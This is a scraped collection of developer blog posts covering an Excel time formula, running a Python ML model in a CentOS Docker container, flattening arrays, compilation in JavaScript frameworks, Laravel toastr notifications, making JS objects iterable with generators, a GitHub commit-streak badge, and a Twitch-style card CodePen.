- **TIME** – In Excel, the [**TIME function**](https://geekexcel.com/how-to-use-time-function-in-excel-365/) helps to create time on your worksheet.
- **Days** – It represents the number of days.
- **Comma symbol (,)** – It is a separator that helps to separate a list of values.
- **Plus operator (+)** – This symbol is used to add the values.
## Example:
Let’s consider the below example image.
- First, we will enter the input values in **Column B** , **Column C** , and **Column D**.
- Here, we have to calculate the total time duration with the number of days.
*Input Ranges*
- Select any cell and type the above-given formula.
*Enter the formula*
- Finally, press **ENTER** to get the result out, if you need, drag the fill handle over range to apply the formula.
*Result*
## Wind-Up:
From this article, you can get some clarification on **how to calculate the total time duration based on the given days, hours, minutes in Excel**. Hope you like it. If you have any **questions** , feel free to **comment**.
Thank you so much for visiting **[Geek Excel](https://geekexcel.com/)!! **If you want to learn more helpful formulas, check out [**Excel Formulas**](https://geekexcel.com/excel-formula/) **!! **
### Related Articles:
- **[How to Copy a Cell to Clipboard using Macros (VBA) in Excel 365?](https://geekexcel.com/how-to-copy-a-cell-to-clipboard-using-macros-vba-in-excel-365/)**
- **[Excel Formulas to Check the Date is within the Last N Days from Today!!](https://geekexcel.com/excel-formulas-to-check-the-date-is-within-the-last-n-days-from-today/)**
- **[Excel Formulas to Sum the Time by Week and Project ~ Easy Tricks!!](https://geekexcel.com/excel-formulas-to-sum-the-time-by-week-and-project/)**
- **[How to Search for a Value in All Tabs in Excel Office 365?](https://geekexcel.com/how-to-search-for-a-value-in-all-tabs-in-excel-office-365/)** | excelgeek |
711,482 | Running Machine Learning Model on Docker Container | The summary of what we're going to build: ->Pull the Docker container image of CentOS image from... | 0 | 2021-05-29T15:46:07 | https://dev.to/karthikkasukurti/running-machine-learning-model-on-docker-container-4k40 | **The summary of what we're going to build:**
->Pull the CentOS container image from Docker Hub and create a new container
-> Install Python on top of the Docker container
-> In the container, copy/create the machine learning model which you created in a Jupyter notebook
Note: I will be using Red Hat Linux as my base machine.
**Starting Docker**
To start docker use this command: `systemctl start docker`
To check the status of Docker use command: `systemctl status docker`
**Installing centos on Docker**
To use the latest version of CentOS use this command: `docker pull centos:latest`

**Checking whether OS has been installed or not**
Command to check: `docker ps -a`

**Launch Docker Image**
Use this command to launch the OS which you pulled from the Docker registry: `docker run -t -i <os-name> ` or `docker run -t -i --name=<container-name> <os-name>`
In our case, we have installed centos so replace `<os-name>` with `centos`. You can give your own `<container-name>`
For example: `docker run -t -i --name=ML1 centos`

Another way to start a Docker container is by running this command: `docker start <container-name>` and then `docker attach <container-name>`
**Container**
Now that we're inside the container, this means that we're basically in a different operating system(OS).
To check the information about OS use: `cat /etc/os-release`

**Installing required packages to create ML model inside container**
Python language: `yum install python3`
Scikit library: `pip3 install scikit-learn`
Pandas library: `pip3 install pandas`
vim module to edit files: `yum install vim`
**Create the model**
First create a model in your Host OS and then copy file to Container using the following command: `docker cp <path-of-model> <container-name>:/<model-file-name>`
Ex: `docker cp model.py ml1:/model.py`

**Train the model**
First create a csv file named `Salary_Data.csv` using `vim Salary_Data.csv` and enter two columns namely `YearsExperience,Salary` and enter values as shown below,

Next we need to train the model using command: `python3 model.py`

Our model is to predict salary based on the person's experience(in yrs)

| karthikkasukurti | |
711,489 | How To Concate Two Dimensional Array
#javascript, #basic #arrays | How to concate Two dimensional Arrays without Using new Set? array=[[1,2,3],[4,5,6],[7,8,9]] // [1,2,... | 0 | 2021-05-28T17:58:07 | https://dev.to/naveed89tech/how-to-concate-two-dimensional-array-javascript-basic-arrays-2elj |
How to concat two-dimensional arrays without using `new Set`?
array=[[1,2,3],[4,5,6],[7,8,9]]
// [1,2,3,4,5,6,7,8,9]
For this we can use the `reduce` method:
`array.reduce((a, b) => a.concat(b), [])` | naveed89tech | |
711,692 | A Look at Compilation in JavaScript Frameworks | In 2017 Tom Dale, wrote Compilers are the New Frameworks. And he was right. In 2017 things were alrea... | 0 | 2021-06-01T21:58:09 | https://dev.to/this-is-learning/a-look-at-compilation-in-javascript-frameworks-3caj | javascript, webdev, svelte, marko | In 2017 Tom Dale, wrote [Compilers are the New Frameworks](https://tomdale.net/2017/09/compilers-are-the-new-frameworks/). And he was right. In 2017 things were already heading that way and have only continued on that trend since.
If you look at the whole range of build tools we use every framework is enhanced by some build ahead process. And if you want to take it to its natural extent you might land on, as @swyx did in his article [Language Servers are the new Frameworks](https://dev.to/dx/language-servers-are-the-new-frameworks-1lbm), down to a language itself.
But there are more steps still to go on this path. This trend of UI frameworks in JavaScript being a language goes back much further. [Elm](https://elm-lang.org/)(2012), [Marko](https://markojs.com/)(2014), and [Imba](https://imba.io/)(2015) are just a handful. But fast-forward to 2021 and we have many more libraries in this space.
And that's why it's more important to familiarize yourself with compilation in JavaScript frameworks. To understand what they are doing and more importantly what they can and cannot do.
# What is a Compiled JavaScript Framework?
Ones where end user code is run through a compiler to produce the final output. To be fair this might be a bit too loose but I want to show that the approach is a spectrum rather than a single target. The term most often gets associated with frameworks like [Svelte](https://svelte.dev/) or [Marko](https://markojs.com/) where everything ends up getting processed. But almost all popular frameworks use some form of ahead of time(AOT) compilation on their templates.
The reason is simple. Declarative interfaces are easier to reason about when you have systems where the inputs can come from many points and propagate through many related or non-related outputs. Most of these compiled frameworks are an extension of their templating languages. So that is the most reasonable place to start.
While there have been a few approaches over the years in the compiled camp now there are two main ones that stick out currently. HTML-first templating languages like [Svelte](https://svelte.dev/), [Vue](https://vuejs.org/), and [Marko](https://markojs.com/), and JavaScript-first templating languages like [JSX](https://facebook.github.io/jsx/).
```html
<section>
<h1>My favorite color</h1>
<div>${input.color.toUpperCase()}</div>
</section>
<shared-footer/>
```
HTML-first templating languages treat the source file like it is an enhancement of HTML and often will work as a perfectly valid HTML partial if used with pure HTML. Some of the earliest form used HTML string attributes for expressions, but most now use JavaScript expressions in their binding syntax.
```jsx
export default FavoriteColor(props) {
return <>
<section>
<h1>My favorite color</h1>
<div>{props.color.toUpperCase()}</div>
</section>
<SharedFooter />
</>;
}
```
JSX provides HTML-like syntax that can be inlined as expressions in your JavaScript. You can view it as almost a different syntax for a function call, and in many cases that is all it is. But JSX is not part of the JavaScript standard, so several frameworks actually leverage its well-defined syntax the same way HTML-based templates do.
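Since JSX is often just another syntax for function calls, it can help to see roughly what a classic transform emits for the template above. This is only a sketch — `createElement` is a toy stand-in for whatever the target framework actually generates:

```javascript
// A toy stand-in for a framework's createElement: it just builds plain
// objects, which is enough to show the shape JSX desugars into.
function createElement(type, props, ...children) {
  return { type, props: props || {}, children };
}

// Hypothetical child component, standing in for <SharedFooter />.
function SharedFooter() {
  return createElement("footer", null, "shared");
}

// Roughly what the JSX template becomes: nested function calls, with
// components passed by reference instead of a tag-name string.
function FavoriteColor(props) {
  return [
    createElement(
      "section",
      null,
      createElement("h1", null, "My favorite color"),
      createElement("div", null, props.color.toUpperCase())
    ),
    createElement(SharedFooter, null),
  ];
}

const [section] = FavoriteColor({ color: "teal" });
console.log(section.children[1].children[0]); // "TEAL"
```

Because the output is plain function calls, a compiler is free to replace them with something else entirely — which is exactly what the frameworks below do.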
# Optimizing Templates
A lot of the motivation for compiled frameworks has come from the desire to optimize these templates further. But there is a lot that can be done with the base templating language. They can be compiled differently for server and browser. They can serve as a means for feature detection to aggressively tree-shake. And many frameworks use templating languages as a way of doing ahead-of-time static analysis to optimize the code that is generated for performance.
Most template-generated code is creation logic, whether it is a bunch of VDOM nodes or real DOM nodes. When looking at a template you can almost immediately identify which parts will never change like literal values in attributes, or fixed groupings of elements. This is low hanging fruit for any templating approach.
A VDOM library like [Inferno](https://infernojs.org/) uses this information to compile its JSX directly into [pre-optimized node](https://github.com/infernojs/babel-plugin-inferno#infernojs-babel-plugin) structures. [Marko](https://markojs.com/) hoists its static VDOM nodes outside of its components so that they don't incur the overhead of recreating them on every render. [Vue](https://vuejs.org/) ups the ante, collecting dynamic nodes to reduce subsequent updates to just those nodes.
[Svelte](https://svelte.dev/) separates its code between create and update lifecycles. [Solid](https://github.com/solidjs/solid) takes that one step further hoisting the DOM creation into clone-able Template elements that create whole portions of the DOM in a single call, incidentally a runtime technique used by Tagged Template Literal libraries like @webreflection's [uhtml](https://github.com/WebReflection/uhtml) and [Lit](https://lit.dev/).
```js
// Solid's compiled output
const _tmpl$ = template(
`<section><h1>My favorite color</h1><div></div></section>`
);
function FavoriteColor(props) {
const _el$ = _tmpl$.cloneNode(true),
_el$2 = _el$.firstChild,
_el$3 = _el$2.nextSibling;
insert(_el$3, () => props.color.toUpperCase());
return [_el$, createComponent(SharedFooter, {})];
}
export default FavoriteColor;
```
With non-VDOM libraries, like [Svelte](https://svelte.dev/) or [Solid](https://github.com/solidjs/solid), we can further optimize for updates as well since the framework is not built on a diff engine. We can use the statically known information like attributes and directly associate template expressions with them, without necessarily understanding much about those expressions. This is basically loop unwinding. Instead of iterating over a list of unknown properties we compile in the inline update expressions. You can think of it like:
```js
if (isDirty(title)) el.setAttribute("title", title);
```
We can even make some further assumptions from the input data in some cases. For example, [Solid](https://github.com/solidjs/solid)'s compiler knows that simple variable bindings are not reactive, as the tracking system relies on getters. So it can choose not to put that code under the update path.
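To make the getter point concrete, here is a toy version of getter-based tracking. The names (`createSignal`, `createEffect`) mirror Solid's API, but the implementation is a deliberately naive sketch: reading a signal inside an effect registers a subscription, while a plain variable has no getter to intercept — which is why the compiler can safely leave plain bindings out of the update path.

```javascript
let currentEffect = null; // the effect currently being tracked, if any

function createSignal(value) {
  const subscribers = new Set();
  const read = () => {
    // The getter is the hook: reading inside an effect subscribes it.
    if (currentEffect) subscribers.add(currentEffect);
    return value;
  };
  const write = (next) => {
    value = next;
    subscribers.forEach((fn) => fn());
  };
  return [read, write];
}

function createEffect(fn) {
  currentEffect = fn;
  fn(); // the initial run collects subscriptions via the getters it touches
  currentEffect = null;
}

const [color, setColor] = createSignal("red");
const log = [];
createEffect(() => log.push(color().toUpperCase()));
setColor("blue");
console.log(log); // ["RED", "BLUE"]
```

A plain `let color = "red"` read inside the effect would return a value with no chance to record the dependency — so there is nothing for the runtime to update, and the compiler knows it.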
There are still limits to what can be analyzed ahead of time. Spreads have to fallback to runtime approaches as do dynamic components like [Svelte](https://svelte.dev/)'s `<svelte:component>` or [Vue](https://vuejs.org/)'s `<component>`.
The other dynamic parts like loops and conditionals are always done at runtime in every framework. **We cannot diff at build time.** We can only narrow down the possibilities for the runtime. But for things like managing lists there are no shortcuts. Their reconciliation methods make up a good chunk of the pulled-in runtime for any framework. Yes, even compiled frameworks have runtimes.
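As a concrete illustration of why lists resist compile-time treatment, here is a grossly simplified keyed reconcile — no move handling, just reuse and removal. Which branch runs depends entirely on runtime data, which is exactly why this logic has to ship in the runtime no matter how clever the compiler is:

```javascript
// Simplified keyed reconciliation: reuse nodes whose keys survive,
// create nodes for new keys, and report the ones that disappeared.
function reconcile(prev, next, create) {
  const byKey = new Map(prev.map((node) => [node.key, node]));
  const result = next.map((key) => {
    const existing = byKey.get(key);
    byKey.delete(key);
    return existing || create(key);
  });
  const removed = [...byKey.values()]; // whatever wasn't claimed
  return { result, removed };
}

const prev = [{ key: "a" }, { key: "b" }, { key: "c" }];
const { result, removed } = reconcile(prev, ["c", "a", "d"], (key) => ({ key }));
console.log(result.map((n) => n.key)); // [ 'c', 'a', 'd' ]
console.log(removed.map((n) => n.key)); // [ 'b' ]
console.log(result[0] === prev[2]); // true — "c" was reused, not recreated
```

Real frameworks do much more (DOM moves, longest-increasing-subsequence tricks), but even this minimal version shows the decisions are data-driven, not template-driven.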
# Beyond Templates
Now, when you have Single File Components, it is arguable whether you shouldn't view the whole file as the template — and a library like [Svelte](https://svelte.dev/) or [Marko](https://markojs.com/) basically treats it as such. There are certain assumptions that can be made when you know that your file represents a single component.
In the case of [Svelte](https://svelte.dev/) this determines the reactive tracking boundary. All reactive atoms declared within a file tell the component to update when they change. In doing so, [Svelte](https://svelte.dev/) can basically compile away its reactive system, removing the need to manage any subscriptions, by simply augmenting every assignment with a call to update the component (`$$invalidate`).
```js
// excerpt from Svelte's compiled output
function instance($$self, $$props, $$invalidate) {
let { color } = $$props;
$$self.$$set = $$props => {
if ("color" in $$props)
$$invalidate(0, color = $$props.color);
};
return [color];
}
```
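The effect of that rewriting can be sketched with a toy dirty-flag tracker. `invalidate` here is only an illustrative stand-in for Svelte's `$$invalidate`, but it shows the key trick: wrapping an assignment both performs it and marks the component slot as changed, with no subscription bookkeeping at all.

```javascript
// Illustrative only: a dirty-bit tracker playing the role of a component
// instance. invalidate() flags a slot as changed and passes the assigned
// value through, so the wrapped assignment stays usable as an expression.
function createComponentState() {
  let dirty = 0;
  return {
    invalidate(bit, value) {
      dirty |= 1 << bit;
      return value;
    },
    isDirty(bit) {
      return (dirty & (1 << bit)) !== 0;
    },
  };
}

const cmp = createComponentState();
let color = "red";
// source code: `color = "blue"` — the compiled form wraps the assignment:
cmp.invalidate(0, (color = "blue"));
console.log(cmp.isDirty(0)); // true
console.log(color); // "blue"
```

The real compiler also schedules a re-render off those dirty bits, but the point is that the "subscription" is baked into the assignment site at build time.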
This is relatively easy for static analysis since the decision can be made by looking at where variables are defined in the scope and updating all the places they are used. But this is much harder to do automatically when these reactive atoms need to come from outside the template. [Svelte](https://svelte.dev/) uses a `$` naming convention to signify stores so the compiler knows how to set up subscriptions.
A similar local optimization is how [Marko](https://markojs.com/) looks for classes in its components to know if they are stateful. Depending on what life-cycles are present on them and the types of bindings being used in the template, you can determine if these components need to be sent to the browser or can be included only on the server. This simple heuristic with some bundler magic makes for a simple approach to Partial Hydration.
Both of these approaches use specific syntax to denote understanding the nature of their state. Their data has become part of their language. While not enforced, have you ever wondered about the potential value of the `use` prefix on [React](https://reactjs.org/) hooks?
# Beyond Modules?

The biggest limitation to compilation is the scope of what it can reasonably analyze. While we can do tricks to inform the compiler, like [Svelte](https://svelte.dev/)'s `$`, we tend not to see beyond `import` statements. This means we have to assume the worst when looking at what inputs come into our components (are they dynamic?). We don't know if child components use our stateful data in a dynamic manner.
This hinders our ability for efficient composition. We need to fallback to usually different runtime mechanisms to fill this gap instead of leveraging the compiler's strengths. What if you could tell how a piece of data could affect the whole app at compile time?
So, for the most part we focus on local optimization. However, bundlers and minifiers get to work with final output code. While there is a lot we can do ahead of time to generate output that plays nice with their ability to optimize, at a certain point compilers will want to get in there too.
What we are doing through specific language is better understanding the developer's intent. Especially with heavy use of declarative constructs. This information is useful at all stages. This is something that is harder to do with general purpose programming languages.
# Conclusion
We are just scratching the surface of compiled JavaScript frameworks, but the techniques that we associate with pure compiled frameworks are working their way into others. For example, [Vue](https://vuejs.org/) has been exploring new [data-level language in their Single File Components](https://github.com/vuejs/rfcs/pull/228). And it is easy since the groundwork is already there.
The approach (HTML-first vs JS-first) each framework takes to templating is mostly a superficial differentiator. There is very little meaningful difference here. But the devil is in the details when it comes to feature support. Every framework has places where it has no choice but to lean heavier on its runtime, and these boundaries are commonly crossed in any significant application. So even code size isn't a clear benefit.
Where compilation excels is abstracting the complexity. From simpler syntax to interact with data and updates, to specialized output for server versus browser. This is a DX tool much like Hot Module Replacement on your bundler's Dev Server. It feeds into better IDE support since the program better understands your intent. And it also can bring performance gains.
Today, the biggest limitation to compiled approaches is that they are module scoped. If compiled approaches want to scale like runtime approaches this is a hurdle we will have to overcome. For now hybrid approaches might be the best solution. But even today, compilers are capable of so much it's hard to picture a future without them being a significant part.
| ryansolid |
711,802 | Laravel 8 Toastr Notifications using yoeunes/toastr package | Hi Friends In this Article, i will explicate you how to install and use toastr notifications utilizi... | 0 | 2021-05-29T04:16:15 | https://dev.to/sonagrabhavesh/laravel-8-toastr-notifications-using-yoeunes-toastr-package-2n3b | laravel, php, tutorial, programming | <p>Hi Friends</p>
<p>In this article, I will explain how to install and use toastr notifications with the yoeunes/toastr package in a Laravel 8 application. We will write a step by step tutorial for Laravel 8 toastr notifications.</p>
<p>The yoeunes/toastr package provides warning, success, error and info notifications. You just have to follow a few steps to implement toastr notifications in your Laravel application. In this example I will build everything from scratch, so just follow the steps below.</p>
<strong class="step">Step 1: Install yoeunes/toastr package</strong>
more..
https://codingtracker.blogspot.com/2021/05/laravel-8-toastr-notifications-using.html | sonagrabhavesh |
711,837 | Making JS Objects iterable | Disclaimer: This is a fun task that I tried doing. I don't see a real world use case for this, especi... | 0 | 2021-05-30T09:27:38 | https://dev.to/ivinjose/making-js-objects-iterable-292j | javascript, generators, iterable, objects | *Disclaimer*: This is a fun task that I tried doing. I don't see a real world use case for this, especially because now that we have Maps in JS. Let me know in the comments if you can think of something.
Now thats out of the way, let's get to it.
As we know, Objects in JS are not iterable. That means you cannot use them with for...of. You must've come across errors similar to:
`TypeError: 'x' is not iterable`
### What are we trying to achieve?
We're trying to understand the technicalities behind the above error. And we will do it by making an object iterable.
### What does it mean when we say `iterable`?
When a value is iterable, under the hood, that value has an implementation of the iterable protocol.
That means, the prototype of that element must have a method which goes like:
`[Symbol.iterator](){}`
..and this method is supposed to return an object like:
```js
{
next(){
//we'll get to the definition of this method
}
}
```
..and this next() method will be called by the iterating functions like for...of. Each time they call next(), they expect an object of the syntax:
`{ value: <value of current iteration>, done: <boolean> }`
The `value` will be made available as the value in `for(const value of element)`, and `done` will be used to know if the iteration needs to be stopped or continued.
### What will we do?
We'll take the object `const range = {from:1, to: 5}` and try to make a for...of print the values between. That is, the output should be: `1, 2, 3, 4, 5`.
Let's write the code and explain what is being done.
```js
let range = {
from: 1,
to: 5,
[Symbol.iterator](){
return {
next: () => {
if(this.from <= this.to){
return { value: this.from++, done: false };
}else{
return { done: true };
}
}
}
}
}
```
Here we've added a new property (method) to our object, with the key `Symbol.iterator`. The for...of loop will look for the implementation of this key, and if the object doesn't have it, it will throw the error we mentioned at the beginning of the blog. And as per the spec, Symbol-based keys need to be written as computed property names, with square brackets around them.
This new method returns an object (like we mentioned a bit above), which has next method in it. The logic of the next method is self explanatory. It increments the value of **from** till it reaches **to**, and on each iteration it returns an object with value and done keys in it.
When done = true (in the last iteration), the for...of loop will stop iterating further.
### Problem with the above code
If you notice, the next method is modifying the value of the original property **from**. At the end of the iteration, it would have reached 6, which is not good. Because we don't want `range = {from: 1, to: 5}` to become `range = {from: 6, to: 5}`. So what do we do?
```js
let range = {
from: 1,
to: 5,
[Symbol.iterator](){
return {
start: this.from,
end: this.to,
next(){
if(this.start <= this.end){
return { value: this.start++, done: false };
}else{
return { done: true };
}
}
}
}
}
```
We've added **start** and **end** variables under the local scope of the object we're returning. We could have kept the same name as **from**, **to**, but that would have created confusion while reading.
Also we've replaced the arrow function with a regular function so that the `this` inside the next() points to the object that we return. Otherwise next() wont have access to **start** and **end** properties.
### Let's use Generators to further optimise this code
[Generator functions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/function*) were designed to solve these kinds of use cases. When called, they return an object with a **next** method in it. And that method returns something like this:
`{ value: <value of current iteration>, done: <boolean> }`
..which is exactly what our for..of needs.
Lets try modifying our code to use generator function.
```js
let range = {
from: 1,
to: 5,
*[Symbol.iterator](){
for(let value=this.from; value<=this.to; value++){
yield value;
}
}
}
```
Each time for...of calls next(), the generator resumes the loop from where it paused, yields the current value (starting with 1), and pauses execution again, waiting for the next call. The next call resumes execution and returns the next value (2), and so on and so forth till it exits the loop.
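To see the protocol in action, we can drive the final iterable by hand — which is exactly what for...of does under the hood — and confirm the original object is left untouched:

```javascript
const range = {
  from: 1,
  to: 5,
  *[Symbol.iterator]() {
    for (let value = this.from; value <= this.to; value++) yield value;
  },
};

// Driving the iterator manually, the way for...of does internally:
const it = range[Symbol.iterator]();
console.log(it.next()); // { value: 1, done: false }

// Any protocol consumer works now: for...of, spread, Array.from...
const values = [...range];
console.log(values); // [ 1, 2, 3, 4, 5 ]
console.log(range.from); // 1 — the original object was not mutated
```

Note that each call to `range[Symbol.iterator]()` returns a fresh generator, so the range can be iterated any number of times.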
Voila! That was simple and clean. Hope you understood how iterator protocol, and generators work. | ivinjose |
712,063 | Decorate your Github! | and more themes...here This is project link Hi There!! im newbie Developer! I... | 0 | 2021-05-29T11:33:09 | https://dev.to/devxb/decorate-your-github-1hib | [](https://github.com/devxb/CommitCombo/blob/main/ENG.md)[](https://github.com/devxb/CommitCombo/blob/main/ENG.md)[](https://github.com/devxb/CommitCombo/blob/main/ENG.md)[](https://github.com/devxb/CommitCombo/blob/main/ENG.md)[](https://github.com/devxb/CommitCombo/blob/main/ENG.md)
<center>and more themes...[here](https://github.com/devxb/CommitCombo/blob/main/ENG.md)</center>
---
[This is project link](https://github.com/devxb/CommitCombo/blob/main/ENG.md)
### Hi There!! I'm a newbie Developer!
I have completed my personal project and am distributing it from my server for free.
<mark>It is recommended for those who commit daily or are interested in decorating GitHub.</mark>
This project shows the number of continuous commit days on GitHub.
You can apply it like the example below.

###### (Mint tag is what I made.)
I have committed for 6 days in a row, and you can see the blue name tag has 6 written on it.
---
[This is project link](https://github.com/devxb/CommitCombo/blob/main/ENG.md)
Any advice on the project would be appreciated.
| devxb | |
712,080 | Twitch's Animated Cards using HTML and CSS | A post by Can Umay | 0 | 2021-05-29T12:09:19 | https://dev.to/canumay/twitch-s-animated-cards-with-html-and-css-o1c | codepen, html, css, frontend | {% codepen https://codepen.io/canumay/pen/gOmGEoK %} | canumay |